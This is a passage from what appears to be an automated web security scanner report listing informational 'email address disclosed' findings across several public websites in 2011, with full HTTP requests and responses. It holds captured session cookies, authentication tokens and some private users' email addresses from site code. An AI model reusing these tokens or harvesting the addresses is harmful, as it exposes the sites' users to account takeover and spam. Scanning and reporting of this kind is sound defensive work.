;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

24.21. http://mediacdn.disqus.com/1303851120/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1303851120/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1303851120/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1303613708.3.3.utmcsr=star-telegram.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/04/23/3022014/your-smartphone-knows-where-youve.html; __utma=113869458.1602204697.1303349184.1303525739.1303613708.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 26 Apr 2011 21:20:30 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Varnish: 2136782920
Cache-Control: max-age=2591036
Expires: Thu, 26 May 2011 21:33:06 GMT
Date: Tue, 26 Apr 2011 21:49:10 GMT
Connection: close
Content-Length: 179725

DISQUS.dtpl=(function(){var a={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};a.getGuestFields=function(f){function e(g){return DISQUS.nodes.get("#"+g+(f?"-"+f:""))}return{name:e("dsq-field
...[SNIP]...

24.22. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: moxieinsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:03:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://moxieinsight.com/moxieinsight/xmlrpc.php
Link: <http://moxieinsight.com?p=5>; rel=shortlink
Set-Cookie: PHPSESSID=7723dec4a574188b7395e7c0bfa68dd2; path=/
Content-Length: 26203
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Moxie Insight - Home<
...[SNIP]...
<a href="mailto:info@moxieinsight.com">info@moxieinsight.com</a>
...[SNIP]...

24.23. https://myaccount.west.thomson.com/MYACCOUNT/Scripts/date.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccount.west.thomson.com
Path:   /MYACCOUNT/Scripts/date.js

Issue detail

The following email address was disclosed in the response:

Request

GET /MYACCOUNT/Scripts/date.js HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
Referer: https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D; MA_ASP.NET_SessionId=3vutg44502ahok55j2zo3o45

Response

HTTP/1.1 200 OK
Content-Length: 10256
Content-Type: application/x-javascript
Content-Location: http://myaccount.west.thomson.com/MYACCOUNT/Scripts/date.js
Last-Modified: Fri, 15 Apr 2011 15:05:44 GMT
Accept-Ranges: bytes
ETag: "014b7977efbcb1:1237"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:44 GMT

// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purp
...[SNIP]...

24.24. https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccount.west.thomson.com
Path:   /MyAccount/AccessControl/AccessControl/SignIn

Issue detail

The following email address was disclosed in the response:

Request

GET /MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined571419undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: MA_ASP.NET_SessionId=wdnkca45qolkzcmo4fjuti55; path=/; HttpOnly
Set-Cookie: .MYACCOUNT=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24458


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
My Account-West&n
...[SNIP]...
<a href="mailto:customerservice@thomsonreuters.com?subject=Assistance Request&body=%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d%0d">
...[SNIP]...

24.25. http://pub.widgetbox.com/scripts/jquery/jquery.jodometer.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.widgetbox.com
Path:   /scripts/jquery/jquery.jodometer.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery/jquery.jodometer.min.js HTTP/1.1
Host: pub.widgetbox.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 21:46:13 GMT
ETag: "afb-4a14c6f50df00+gzip"
Last-Modified: Tue, 19 Apr 2011 21:46:04 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: ECS (dca/5330)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 2811

/*
* jOdometer (1.0) // 2008.03.17 // <http://plugins.jquery.com/project/jOdometer>
*
* REQUIRES jQuery 1.2.3+ <http://jquery.com/>
*
* Copyright (c) 2008 TrafficBroker <http://www.trafficbroker.co.
...[SNIP]...
<jesus.carrera@trafficbroker.co.uk>
...[SNIP]...

24.26. http://scripts.omniture.com/javascript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /javascript.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript.js HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; mbox=PC#1303601743323-887111.17#1306068395|session#1303649073183-321692#1303651055|check#true#1303649261; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C
If-Modified-Since: Sun, 24 Apr 2011 02:46:46 GMT

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Mon, 25 Apr 2011 22:56:45 GMT
xserver: www5.dmz
Content-Type: text/javascript;charset=utf-8
Content-Length: 490283
Cache-Control: public, max-age=8469
Expires: Tue, 26 Apr 2011 22:56:28 GMT
Date: Tue, 26 Apr 2011 20:35:19 GMT
Connection: close

/* files/global/scripts/general/global.js */
/* files/global/scripts/general/validate_forms.js */
/* files/global/scripts/general/base64.js */
/* files/global/scripts/tracking/s_code_remote_current.js
...[SNIP]...
;@v=s.vs(sed)`5trk`F@v)#2=s.mr($0,(vt#Rt`Tvt)`n+s.hav()+q+(qs?qs:s.rq(^4)"
+"),0,id,ta);qs`i;`Ym('t')`5s.p_r)s.p_r(`V`b`i}^G(qs);^b`t(@u;`p@u`M^2,`H$H1',vb`G''`5#E)`I^z$x=`I^zeo=`I^z`X`q=`I^z`X^c`i`5!id@Ss.tc@1tc=1;s.flush`U()}`2#2`9tl`0o,t,n,vo`1;@X=$6o`V`X^c=t;s.`X`q=n;s."
+"t(@u}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$6o)`9wd^zgs`0u$R`L^t#51,#U`2s.t()`9wd^zdc`0u$R`L^t#5#U`2s.t()}}@A=(`I`P`g`8`4$4s@o0`Vd=^9;s
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.27. https://secure.bundle.com/assets/js/build/global.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bundle.com
Path:   /assets/js/build/global.min.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /assets/js/build/global.min.js HTTP/1.1
Host: secure.bundle.com
Connection: keep-alive
Referer: https://secure.bundle.com/msn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1303843206.1.1.utmcsr=money.msn.com|utmccn=(referral)|utmcmd=referral|utmcct=/taxes/; __utma=1.2122043951.1303843206.1303843206.1303843206.1; __utmc=1; __utmb=1.2.10.1303843206; SESSIONID=h50b1r45qzwyxs34b22hzjzc

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Mar 2011 23:02:36 GMT
Accept-Ranges: bytes
ETag: "856690111ce8cb1:0"
Server: Microsoft-IIS/7.0
X-Bundle-Server: prod-web06
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 18:41:37 GMT
Connection: keep-alive
Content-Length: 172431

var hexcase=0;function hex_md5(b){return rstr2hex(rstr_md5(str2rstr_utf8(b)));}function hex_hmac_md5(c,d){return rstr2hex(rstr_hmac_md5(str2rstr_utf8(c),str2rstr_utf8(d)));}function md5_vm_test(){retu
...[SNIP]...
edInUserInfo({uid:a.uid,onSuccess:function(b){swell.svc.loginSvc.userProfile=b;if(a.createCookie){logger.log("login svc: create session: cookie set");swell.cookies.login.set(b.uid+"|"+b.uid+"|12838473|test@test.com");}a.onSuccess(b);}});},login:function(b){var a=this;this.getFBUserId(function(c){a.createSession({uid:c.uid,onSuccess:function(){b.onSuccess(a.userProfile);}});});},logOut:function(a){FB.Connect.logo
...[SNIP]...
straint.availConstraints.NotBlank,onFail:function(){f("Let's try this again.");}}),new txtConstraint({expression:txtConstraint.availConstraints.ValidEmail,onFail:function(){f('Please use that classic "name@site.com" format and try again.');}})]});this.emailValidator.registerItem(c);};swell.views.emailModView.prototype=new swell.views.baseView();swell.views.emailModView.constructor=swell.views.emailModView;swell.
...[SNIP]...

24.28. http://static.move.com/lib/rdc/6.0.10_P1A/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.move.com
Path:   /lib/rdc/6.0.10_P1A/common.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /lib/rdc/6.0.10_P1A/common.js HTTP/1.1
Host: static.move.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:49 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n12.panthercdn.com
ETag: "09b9f45953cc1:0"
Cache-Control: max-age=31536000
Expires: Wed, 25 Apr 2012 00:26:42 GMT
Age: 66007
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 443829
Last-Modified: Mon, 25 Apr 2011 22:08:14 GMT
Connection: keep-alive
Content-Length: 443829

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YA
...[SNIP]...
19bb48613ef6286c&ts=633886097302345847","http://my.realtor.com/rdc/ImageBugLoginHandler.ashx?sc=rdc&id=4865430&rem=True&ac=login&h=3911ba8d31e3d2333a72ae9d19bb48613ef6286c&ts=633886097302345847"],eml:"top_yema@hotmail.com",error:[],fName:"top_yema",isLogin:true,lName:null,regID:4865430,savedListings:["MA89369040","1104584998","1104661207","1108186148","1112256998","MA38034625","MA38034398","MA90828467"],service:true,ss
...[SNIP]...
31a2cb9cb676d43&ts=633886983969966580","http://my.realtor.com/rdc/ImageBugLoginHandler.ashx?sc=rdc&id=4908151&rem=False&ac=login&h=d09a6e8adc40907777f3e92c431a2cb9cb676d43&ts=633886983969966580"],eml:"steve.ma@topproducer.com",error:[],fName:"steve.ma",isLogin:true,lName:null,regID:4908151,savedListings:null,service:true,ssCnt:0,status:"NewUser"})};this.signout=function(params,func){func({addr:null,cookieUrls:["http://my.m
...[SNIP]...
E.cfg.getProperty("width")+"px",zIndex:10000,constraintoviewport:true,underlay:"none"});ay.cfg.queueProperty("keylisteners",new am(aE.id,{ctrl:true,shift:true,keys:81},{fn:function(){I("siEml").value="Buzz.Lightyear@move.com";I("siPwd").value="password";I("suEml").value="Buzz.Lightyear@move.com";I("suPass").value="password";I("suPassRepeat").value="password";I("srchName").value="Search 420";I("pwEml").value="Buzz.Lightyear@move.com";I("suGender").value="M";I("suYob").value=1950},scope:ay,correctScope:true}));ay.beforeHideEvent.subscribe(aE._beforeHideEvent,aE,true);if(aE.cfg.getProperty("offClickCloses")===true){ay.showEvent.sub
...[SNIP]...

24.29. http://support.moxiesoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:01:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Tue, 26 Apr 2011 21:01:06 GMT
Set-Cookie: ASPSESSIONIDQABACBCB=NHEPJGDDIMDAFCDMFDDMALJF; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<a href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

24.30. http://support.moxiesoft.com/tal_includes/generalfunctions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /tal_includes/generalfunctions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_includes/generalfunctions.js HTTP/1.1
Host: support.moxiesoft.com
Proxy-Connection: keep-alive
Referer: http://support.moxiesoft.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162954400.1303851424.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.298774119.1303851424.1303851424.1303851424.1; __utmc=162954400; __utmb=162954400.1.10.1303851424; ASPSESSIONIDQABACBCB=LHEPJGDDOPJHENMIGDNHLGFF

Response

HTTP/1.1 200 OK
Content-Length: 6653
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Sep 2005 19:16:52 GMT
Accept-Ranges: bytes
ETag: "0eab9b04ebdc51:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:56:43 GMT


function IsWhiteSpace(char)
{
   if (char == " " || char == "\n" || char == "\t" || char == "\f" || char == "\r")
       return true;

   return false;
}

function IsDigit(char)
{    
   if(char == "0
...[SNIP]...
ng string represents an atom (basically a series of
non-special characters.) */
var atom=validChars + '+'
/* The following string represents one word in the typical username.
For example, in john.doe@somewhere.com, john and doe are words.
Basically, a word is either an atom or quoted string. */
var word="(" + atom + "|" + quotedUser + ")"
// The following pattern describes the structure of the user
var u
...[SNIP]...

24.31. http://west.thomson.com/support/contact-us/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:34 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=89EA3F93E09614D9A098CCCF9C0F29D3204EE9663C01D51E95CD9C592CDADB23A34786B30EBABB2390E7FEA51BBE62180DADFAF255CA8AB719509015068D68C8075FE6A23F095DF549827C80033255DA36E699502293674B6D668FCAE278ADD04138D880C6A3F40E0EDE98A77853F1F1B45413E1BE2A34BEE937DCCCDA776CE1ABCED0F26FB69F2755769BB874466A73E9A83CADFE53A93539D3BD0332C48F697F141BAC00E38E27C2938518BE9D5C9648C952E2BEF872DC06486975DC27BFACFEF36294DEAF331A255D5995D5F54EF39A2AFCD97B20A7D318572959553AEEC610017BD6; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90651


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<a href="mailto:west.referenceattorneys@thomson.com" class="StandardLinkBlue Bold">
...[SNIP]...
<a href="mailto:techsupport@thomsonreuters.com" class="StandardLinkBlue Bold">
...[SNIP]...
<a href="mailto:west.customer.service@thomson.com" class="StandardLinkBlue Bold">
...[SNIP]...
<a href="mailto:bookstore@westgroup.com" class="StandardLinkBlue Bold">
...[SNIP]...
<a href="mailto:west.fed.govt@thomson.com" class="StandardLinkBlue Bold">
...[SNIP]...
<a href="mailto:west.customer.service@thomson.com" class="StandardLinkBlue Bold">
...[SNIP]...

24.32. http://www.aac.org/css/FriendraiserUserStyle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aac.org
Path:   /css/FriendraiserUserStyle.css

Issue detail

The following email address was disclosed in the response:

Request

GET /css/FriendraiserUserStyle.css HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
Referer: http://www.aac.org/site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JServSessionIdr004=lsqkic26r1.app213b

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 243
Date: Tue, 26 Apr 2011 21:40:07 GMT
Cache-Control: private
Connection: Keep-Alive
Via: NS-CACHE-6.0: 60
ETag: "5aece2f-1c60-4c5b7ec5"
Server: Apache
Last-Modified: Fri, 06 Aug 2010 03:17:25 GMT
Accept-Ranges: bytes
Cteonnt-Length: 7264
Keep-Alive: timeout=8, max=443
Content-Type: text/css
Content-Length: 7264

/*
* This CSS defines styles specific to the Friendraiser/Tributes application user side.
*
* $Id: FriendraiserUserStyle.css 147349 2010-06-15 18:59:35Z sdavis@convio.com $
*/

/* Styles for instructional text for form fields */
.Instructions {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   font-size: 9pt;
   color: #000;
}
/* Styles for text label for form field
...[SNIP]...

24.33. http://www.bcbst.com/js/accordian/jquery.dimensions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bcbst.com
Path:   /js/accordian/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/accordian/jquery.dimensions.js HTTP/1.1
Host: www.bcbst.com
Proxy-Connection: keep-alive
Referer: http://www.bcbst.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Content-Length: 3442
Content-Type: application/x-javascript
Last-Modified: Sat, 08 Mar 2008 16:56:36 GMT
Accept-Ranges: bytes
ETag: "0fa965e3d81c81:12e16"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:24:56 GMT

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

24.34. https://www.bcbst.com/brokers/group/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /brokers/group/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /brokers/group/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
